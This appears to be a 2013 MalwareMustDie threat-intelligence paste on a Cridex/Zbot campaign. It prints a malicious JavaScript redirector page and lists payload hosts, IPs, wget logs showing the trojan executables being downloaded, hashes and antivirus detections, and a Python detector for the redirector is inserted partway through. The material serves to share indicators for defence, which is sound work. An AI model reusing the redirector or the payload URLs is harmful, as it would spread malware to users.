MalwareMustDie

PWS Cridex/fareit Today - 2013 03-14

Mar 13th, 2013
#MalwareMustDie! On duty: @unixfreaxjp ~]$ date
Thu Mar 14 02:28:24 JST 2013
Credit: thanks to @hugbomb and @nyxbone
// Case: http://malwaremustdie.blogspot.jp/2013/02/bhek-cridex-combo-with-ransomware.html
// Case: http://malwaremustdie.blogspot.com/2013/03/ru8080columnphp-hey-stealer-what-do-you.html
// Rgx: http://goo.gl/KvD2q

#Cridex domains today:

// infector pattern: a redirector page:

<html>
<head>
<meta h00p-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Please wait</title>
</head>
<body>
<h2><b>Please wait a moment ・・・ You will be forwarded・ </h2></b>
<h5>Internet Explorer and Mozilla Firefox compatible only</h5><br>

<script>
var1=49;
var2=var1;
if(var1==var2) {document・location="h00p://giimiiifo・ru:8080/forum/links/column・php";}
</script>

</body>
</html>

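Added example, not part of the paste: a small Python check that flags the redirector pattern above in a captured page. It looks for the "Please wait" title, the two-variable assignment whose equality test is always true, and the document.location target, then reports whether that target has the :8080/forum/links/column.php shape listed on this paste. The names `find_redirector`, `SAMPLE_PAGE` and the host `redirector.example` are my own; the sample page is constructed from the pattern shown above.

```python
import re

# Constructed sample of the "Please wait" redirector page shown above, using a
# placeholder host rather than one of the paste's domains.
SAMPLE_PAGE = """<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Please wait</title>
</head>
<body>
<h2><b>Please wait a moment ... You will be forwarded. </h2></b>
<h5>Internet Explorer and Mozilla Firefox compatible only</h5><br>
<script>
var1=49;
var2=var1;
if(var1==var2) {document.location="http://redirector.example:8080/forum/links/column.php";}
</script>
</body>
</html>"""

# The script assigns a number to one variable, copies it into a second and then
# branches on their equality: the test is always true, so this is an unconditional
# redirect disguised as a condition. Group 3 captures the destination URL.
TAUTOLOGY_REDIRECT_RE = re.compile(
    r"(\w+)\s*=\s*\d+\s*;\s*"                       # var1=49;
    r"(\w+)\s*=\s*\1\s*;\s*"                         # var2=var1;
    r"if\s*\(\s*\1\s*==\s*\2\s*\)\s*\{\s*"           # if(var1==var2) {
    r"document\.location\s*=\s*[\"']([^\"']+)[\"']"  # document.location="...";
)
# Landing URL shape seen on this paste: host:8080/forum/links/column.php
LANDING_RE = re.compile(r"^https?://([^/:]+):(\d+)(/forum/links/column\.php)", re.I)


def find_redirector(html):
    """Return details of a Cridex-style tautological redirect, or None."""
    if not re.search(r"<title>\s*Please wait\s*</title>", html, re.I):
        return None
    m = TAUTOLOGY_REDIRECT_RE.search(html)
    if not m:
        return None
    url = m.group(3)
    landing = LANDING_RE.match(url)
    return {
        "url": url,
        "host": landing.group(1) if landing else None,
        "port": int(landing.group(2)) if landing else None,
        "matches_column_php_pattern": bool(landing and landing.group(2) == "8080"),
    }
```

Run `find_redirector(SAMPLE_PAGE)` to get the extracted host, port and a flag for the column.php landing pattern; a page with a different title or a genuine conditional returns None.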
//domains:PORT (all)

//IP:
94・102・14・239,
213・215・240・24,
93・174・138・48

//payload url:

//payload download snapshot:
http://urlquery.net/report.php?id=1407705
http://urlquery.net/report.php?id=1407845
http://urlquery.net/report.php?id=1407852
http://urlquery.net/report.php?id=1407854
http://urlquery.net/report.php?id=1407859
http://urlquery.net/report.php?id=1407866
http://urlquery.net/report.php?id=1407806
http://urlquery.net/report.php?id=1407807
http://urlquery.net/queued.php?id=17250910
http://urlquery.net/report.php?id=1407711

//some of the download logs as PoC (text):
--2013-03-14 02:17:05-- h00p://gimiiiank・ru:8080/forum/links/column・php?gf=2w:1l:1l:2v:1f&xe=2v:1k:1m:32:33:1k:1k:31:1j:1o&r=1k&hy=e&gy=m
Resolving gimiiiank・ru・・・ 94・102・14・239, 213・215・240・24, 93・174・138・48
Connecting to gimiiiank・ru|94・102・14・239|:8080・・・ connected・
h00p request sent, awaiting response・・・ 200 OK
Length: 175104 (171K) [application/x-msdownload]
Saving to: `sample1・exe'
2013-03-14 02:17:09 (63・6 KB/s) - `sample1・exe' saved [175104/175104]

--2013-03-14 02:17:36-- h00p://giminaaaao・ru:8080/forum/links/column・php?gf=2w:1l:1l:2v:1f&xe=2v:1k:1m:32:33:1k:1k:31:1j:1o&r=1k&hy=e&gy=m
Resolving giminaaaao・ru・・・ 94・102・14・239, 213・215・240・24, 93・174・138・48
Connecting to giminaaaao・ru|94・102・14・239|:8080・・・ connected・
Saving to: `sample2・exe'
2013-03-14 02:17:40 (62・8 KB/s) - `sample2・exe' saved [175104/175104]

--2013-03-14 02:18:07-- h00p://giimiiifo・ru:8080/forum/links/column・php?gf=2w:1l:1l:2v:1f&xe=2v:1k:1m:32:33:1k:1k:31:1j:1o&r=1k&hy=e&gy=m
Resolving giimiiifo・ru・・・ 94・102・14・239, 213・215・240・24, 93・174・138・48
Connecting to giimiiifo・ru|94・102・14・239|:8080・・・ connected・
h00p request sent, awaiting response・・・ 200 OK
Length: 175104 (171K) [application/x-msdownload]
Saving to: `sample3・exe'
2013-03-14 02:18:12 (65・0 KB/s) - `sample3・exe' saved [175104/175104]

// same sample PoC:

$ md5 sample*

[Path] / filename MD5 sum
-------------------------------------------------------------------------------
[C:\Program Files\GnuWin32-new\bin\]
sample1・exe f0063edef419009b1564e5fba81157db
sample2・exe f0063edef419009b1564e5fba81157db
sample3・exe f0063edef419009b1564e5fba81157db


VirusTotal : https://www.virustotal.com/en/file/028b2eccba3d7e0792e4fcab685c4003c7bb297773f5b14b3cfe55c62a41304a/analysis/
SHA256: 028b2eccba3d7e0792e4fcab685c4003c7bb297773f5b14b3cfe55c62a41304a
SHA1: fb570e861a9388327a77635ca0568d4b73342296
MD5: f0063edef419009b1564e5fba81157db
File size: 171・0 KB ( 175104 bytes )
File name: contacts・exe / info・exe / calc・exe
File type: Win32 EXE
Tags: peexe
Detection ratio: 3 / 44
Analysis date: 2013-03-13 15:40:26 UTC ( 1 hour, 52 minutes ago )

Malwarebytes : Trojan・Zbot
AhnLab-V3 : Spyware/Win32・Zbot
Kaspersky : HEUR:Trojan・Win32・Generic

---
#MalwareMustDie!!